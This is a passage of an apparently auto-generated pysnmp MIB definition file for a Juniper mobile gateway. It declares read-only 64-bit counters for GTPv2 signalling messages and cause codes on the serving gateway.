jnxMbgSgwDelBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 45), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelBrReqRx.setDescription('Number of GTP V2 Delete Bearer Request received.')
jnxMbgSgwDelBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 46), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelBrReqTx.setDescription('Number of GTP V2 Delete Bearer Request Sent.')
jnxMbgSgwDelBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 47), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelBrRspRx.setDescription('Number of GTP V2 Delete Bearer Response received.')
jnxMbgSgwDelBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 48), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelBrRspTx.setDescription('Number of GTP V2 Delete Bearer Response Sent.')
jnxMbgSgwDelConnSetReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 49), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelConnSetReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelConnSetReqRx.setDescription('Number of GTP V2 Delete PDN connection set Request received.')
jnxMbgSgwDelConnSetReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 50), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelConnSetReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelConnSetReqTx.setDescription('Number of GTP V2 Delete PDN connection set Request Sent.')
jnxMbgSgwDelConnSetRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 51), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelConnSetRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelConnSetRspRx.setDescription('Number of GTP V2 Delete PDN connection set Response received.')
jnxMbgSgwDelConnSetRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 52), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelConnSetRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelConnSetRspTx.setDescription('Number of GTP V2 Delete PDN connection set Response Sent.')
jnxMbgSgwUpdConnSetReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 53), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwUpdConnSetReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwUpdConnSetReqRx.setDescription('Number of GTP V2 Update Connection set Request received.')
jnxMbgSgwUpdConnSetReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 54), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwUpdConnSetReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwUpdConnSetReqTx.setDescription('Number of GTP V2 Update Connection set Request Sent.')
jnxMbgSgwUpdConnSetRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 55), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwUpdConnSetRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwUpdConnSetRspRx.setDescription('Number of GTP V2 Update Connection set Response received.')
jnxMbgSgwUpdConnSetRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 56), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwUpdConnSetRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwUpdConnSetRspTx.setDescription('Number of GTP V2 Update Connection set Response Sent.')
jnxMbgSgwModBrCmdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 57), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwModBrCmdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwModBrCmdRx.setDescription('Number of GTP V2 Modify Bearer Command received.')
jnxMbgSgwModBrCmdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 58), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwModBrCmdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwModBrCmdTx.setDescription('Number of GTP V2 Modify Bearer Command Sent.')
jnxMbgSgwModBrFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 59), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwModBrFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwModBrFlrIndRx.setDescription('Number of GTP V2 Modify Bearer Failure received.')
jnxMbgSgwModBrFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 60), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwModBrFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwModBrFlrIndTx.setDescription('Number of GTP V2 Modify Bearer Failure Sent.')
jnxMbgSgwDelBrCmdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 61), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelBrCmdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelBrCmdRx.setDescription('Number of GTP V2 Delete Bearer Command received.')
jnxMbgSgwDelBrCmdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 62), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelBrCmdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelBrCmdTx.setDescription('Number of GTP V2 Delete Bearer Command Sent.')
jnxMbgSgwDelBrFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 63), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelBrFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelBrFlrIndRx.setDescription('Number of GTP V2 Delete Bearer Failure received.')
jnxMbgSgwDelBrFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 64), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelBrFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelBrFlrIndTx.setDescription('Number of GTP V2 Delete Bearer Failure Sent.')
jnxMbgSgwBrResCmdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 65), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwBrResCmdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwBrResCmdRx.setDescription('Number of GTP V2 Bearer Response Command received.')
jnxMbgSgwBrResCmdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 66), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwBrResCmdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwBrResCmdTx.setDescription('Number of GTP V2 Bearer Response Command Sent.')
jnxMbgSgwBrResFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 67), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwBrResFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwBrResFlrIndRx.setDescription('Number of GTP V2 Bearer Resource Failure received.')
jnxMbgSgwBrResFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 68), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwBrResFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwBrResFlrIndTx.setDescription('Number of GTP V2 Bearer Resource Failure Sent.')
jnxMbgSgwRelAcsBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 69), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwRelAcsBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwRelAcsBrReqRx.setDescription('Number of GTP V2 Release Access Bearer Requests received.')
jnxMbgSgwRelAcsBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 70), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwRelAcsBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwRelAcsBrReqTx.setDescription('Number of GTP V2 Release Access Bearer Requests sent.')
jnxMbgSgwRelAcsBrRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 71), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwRelAcsBrRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwRelAcsBrRespRx.setDescription('Number of GTP V2 Release Access Bearer Response received.')
jnxMbgSgwRelAcsBrRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 72), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwRelAcsBrRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwRelAcsBrRespTx.setDescription('Number of GTP V2 Release Access Bearer Response sent.')
jnxMbgSgwCrIndTunReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 73), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCrIndTunReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCrIndTunReqRx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Request Received')
jnxMbgSgwCrIndTunReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 74), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCrIndTunReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCrIndTunReqTx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Request sent')
jnxMbgSgwCrIndTunRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 75), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCrIndTunRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCrIndTunRespRx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Response Received')
jnxMbgSgwCrIndTunRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 76), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCrIndTunRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCrIndTunRespTx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Response sent')
jnxMbgSgwDelIndTunReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 77), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelIndTunReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelIndTunReqRx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Request Received')
jnxMbgSgwDelIndTunReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 78), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelIndTunReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelIndTunReqTx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Request sent.')
jnxMbgSgwDelIndTunRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 79), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelIndTunRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelIndTunRespRx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Response Received')
jnxMbgSgwDelIndTunRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 80), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelIndTunRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelIndTunRespTx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Response sent.')
jnxMbgSgwDlDataNotifRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 81), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDlDataNotifRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDlDataNotifRx.setDescription('Number of GTP V2 Downlink Data Notify received.')
jnxMbgSgwDlDataNotifTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 82), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDlDataNotifTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDlDataNotifTx.setDescription('Number of GTP V2 Downlink Data Notify Sent.')
jnxMbgSgwDlDataAckRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 83), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDlDataAckRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDlDataAckRx.setDescription('Number of GTP V2 Downlink Data Notify Acknowledgement received.')
jnxMbgSgwDlDataAckTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 84), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDlDataAckTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDlDataAckTx.setDescription('Number of GTP V2 Downlink Data Notify Acknowledgement Sent.')
jnxMbgSgwDlDataNotiFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 85), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDlDataNotiFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDlDataNotiFlrIndRx.setDescription('Number of GTP V2 Downlink Data Notification fail received.')
jnxMbgSgwDlDataNotiFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 86), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDlDataNotiFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDlDataNotiFlrIndTx.setDescription('Number of GTP V2 Downlink Data Notification fail Sent.')
jnxMbgSgwStopPagingIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 87), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwStopPagingIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwStopPagingIndRx.setDescription('Number of GTP V2 Number of Stop Paging Indication Messages Received.')
jnxMbgSgwStopPagingIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 88), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwStopPagingIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwStopPagingIndTx.setDescription('Number of GTP V2 Number of Stop Paging Indicaton messages sent')
jnxMbgSgwGtpV2ICsPageRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 89), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPageRx.setStatus('obsolete')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPageRx.setDescription('Number of GTPV2 packets received with cause Page.')
jnxMbgSgwGtpV2ICsPageTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 90), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPageTx.setStatus('obsolete')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPageTx.setDescription('Number of GTP packets sent with cause Page.')
jnxMbgSgwGtpV2ICsReqAcceptRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 91), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsReqAcceptRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsReqAcceptRx.setDescription('Number of GTPV2 packets received with cause Request Accept.')
jnxMbgSgwGtpV2ICsReqAcceptTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 92), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsReqAcceptTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsReqAcceptTx.setDescription('Number of GTP packets sent with cause Request Accept.')
jnxMbgSgwGtpV2ICsAcceptPartRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 93), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAcceptPartRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAcceptPartRx.setDescription('Number of GTPV2 packets received with cause Accept Partial.')
jnxMbgSgwGtpV2ICsAcceptPartTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 94), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAcceptPartTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAcceptPartTx.setDescription('Number of GTP packets sent with cause Accept Partial.')
jnxMbgSgwGtpV2ICsNewPTNPrefRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 95), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNewPTNPrefRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNewPTNPrefRx.setDescription('Number of GTPV2 packets received with cause New PDN type due to Network Preference.')
jnxMbgSgwGtpV2ICsNewPTNPrefTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 96), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNewPTNPrefTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNewPTNPrefTx.setDescription('Number of GTP packets sent with cause New PDN type due to Network Preference')
jnxMbgSgwGtpV2ICsNewPTSIAdbrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 97), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNewPTSIAdbrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNewPTSIAdbrRx.setDescription('Number of GTPV2 packets received with cause New PDN type due to Single Address Bearer.')
jnxMbgSgwGtpV2ICsNewPTSIAdbrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 98), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNewPTSIAdbrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNewPTSIAdbrTx.setDescription('Number of GTP packets sent with cause New PDN type due to Single Address Bearer.')
jnxMbgSgwGtpV2ICsCtxNotFndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 99), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCtxNotFndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCtxNotFndRx.setDescription('Number of GTPV2 packets received with cause Context not found.')
jnxMbgSgwGtpV2ICsCtxNotFndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 100), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCtxNotFndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCtxNotFndTx.setDescription('Number of GTP packets sent with cause Context not found.')
jnxMbgSgwGtpV2ICsInvMsgFmtRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 101), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvMsgFmtRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvMsgFmtRx.setDescription('Number of GTPV2 packets received with cause Invalid Message Format.')
jnxMbgSgwGtpV2ICsInvMsgFmtTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 102), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvMsgFmtTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvMsgFmtTx.setDescription('Number of GTP packets sent with cause Invalid Message Format.')
jnxMbgSgwGtpV2ICsVerNotSuppRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 103), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsVerNotSuppRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsVerNotSuppRx.setDescription('Number of GTPV2 packets received with cause Version not Supported.')
jnxMbgSgwGtpV2ICsVerNotSuppTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 104), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsVerNotSuppTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsVerNotSuppTx.setDescription('Number of GTP packets sent with cause Version not Supported.')
jnxMbgSgwGtpV2ICsInvLenRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 105), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvLenRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvLenRx.setDescription('Number of GTPV2 packets received with cause Invalid Length.')
jnxMbgSgwGtpV2ICsInvLenTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 106), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvLenTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvLenTx.setDescription('Number of GTP packets sent with cause Invalid Length.')
jnxMbgSgwGtpV2ICsServNotSuppRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 107), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsServNotSuppRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsServNotSuppRx.setDescription('Number of GTPV2 packets received with cause Service Not supported.')
jnxMbgSgwGtpV2ICsServNotSuppTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 108), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsServNotSuppTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsServNotSuppTx.setDescription('Number of GTP packets sent with cause Service Not supported.')
jnxMbgSgwGtpV2ICsManIEIncorrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 109), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsManIEIncorrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsManIEIncorrRx.setDescription('Number of GTPV2 packets received with cause Mandatory IE incorrect.')
jnxMbgSgwGtpV2ICsManIEIncorrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 110), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsManIEIncorrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsManIEIncorrTx.setDescription('Number of GTP packets sent with cause Mandatory IE incorrect.')
jnxMbgSgwGtpV2ICsManIEMissRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 111), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsManIEMissRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsManIEMissRx.setDescription('Number of GTPV2 packets received with cause Mandatory IE Missing.')
jnxMbgSgwGtpV2ICsManIEMissTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 112), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsManIEMissTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsManIEMissTx.setDescription('Number of GTP packets sent with cause Mandatory IE Missing.')
jnxMbgSgwGtpV2ICsOptIEIncorrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 113), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsOptIEIncorrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsOptIEIncorrRx.setDescription('Number of GTPV2 packets received with cause Optional IE Incorrect.')
jnxMbgSgwGtpV2ICsOptIEIncorrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 114), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsOptIEIncorrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsOptIEIncorrTx.setDescription('Number of GTP packets sent with cause Optional IE Incorrect.')
jnxMbgSgwGtpV2ICsSysFailRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 115), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSysFailRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSysFailRx.setDescription('Number of GTPV2 packets received with cause System Failure.')
jnxMbgSgwGtpV2ICsSysFailTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 116), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSysFailTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSysFailTx.setDescription('Number of GTP packets sent with cause System Failure.')
jnxMbgSgwGtpV2ICsNoResRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 117), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNoResRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNoResRx.setDescription('Number of GTPV2 packets received with cause No Resource.')
